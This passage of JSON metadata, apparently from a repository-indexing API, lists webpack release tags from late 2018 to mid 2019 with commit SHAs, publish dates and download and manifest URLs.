tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/t